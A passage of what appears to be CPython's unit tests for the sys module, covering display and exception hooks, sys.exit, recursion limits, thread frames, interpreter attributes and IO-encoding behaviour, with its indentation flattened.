# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ActiveExceptionTests(unittest.TestCase):
def test_exc_info_no_exception(self):
self.assertEqual(sys.exc_info(), (None, None, None))
def test_sys_exception_no_exception(self):
self.assertEqual(sys.exception(), None)
def test_exc_info_with_exception_instance(self):
def f():
raise ValueError(42)
try:
f()
except Exception as e_:
e = e_
exc_info = sys.exc_info()
self.assertIsInstance(e, ValueError)
self.assertIs(exc_info[0], ValueError)
self.assertIs(exc_info[1], e)
self.assertIs(exc_info[2], e.__traceback__)
def test_exc_info_with_exception_type(self):
def f():
raise ValueError
try:
f()
except Exception as e_:
e = e_
exc_info = sys.exc_info()
self.assertIsInstance(e, ValueError)
self.assertIs(exc_info[0], ValueError)
self.assertIs(exc_info[1], e)
self.assertIs(exc_info[2], e.__traceback__)
def test_sys_exception_with_exception_instance(self):
def f():
raise ValueError(42)
try:
f()
except Exception as e_:
e = e_
exc = sys.exception()
self.assertIsInstance(e, ValueError)
self.assertIs(exc, e)
def test_sys_exception_with_exception_type(self):
def f():
raise ValueError
try:
f()
except Exception as e_:
e = e_
exc = sys.exception()
self.assertIsInstance(e, ValueError)
self.assertIs(exc, e)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
@support.requires_subprocess()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
@support.requires_subprocess()
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@support.requires_subprocess()
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
@support.requires_subprocess()
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
@support.requires_subprocess()
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
@support.requires_subprocess()
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@support.requires_subprocess()
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
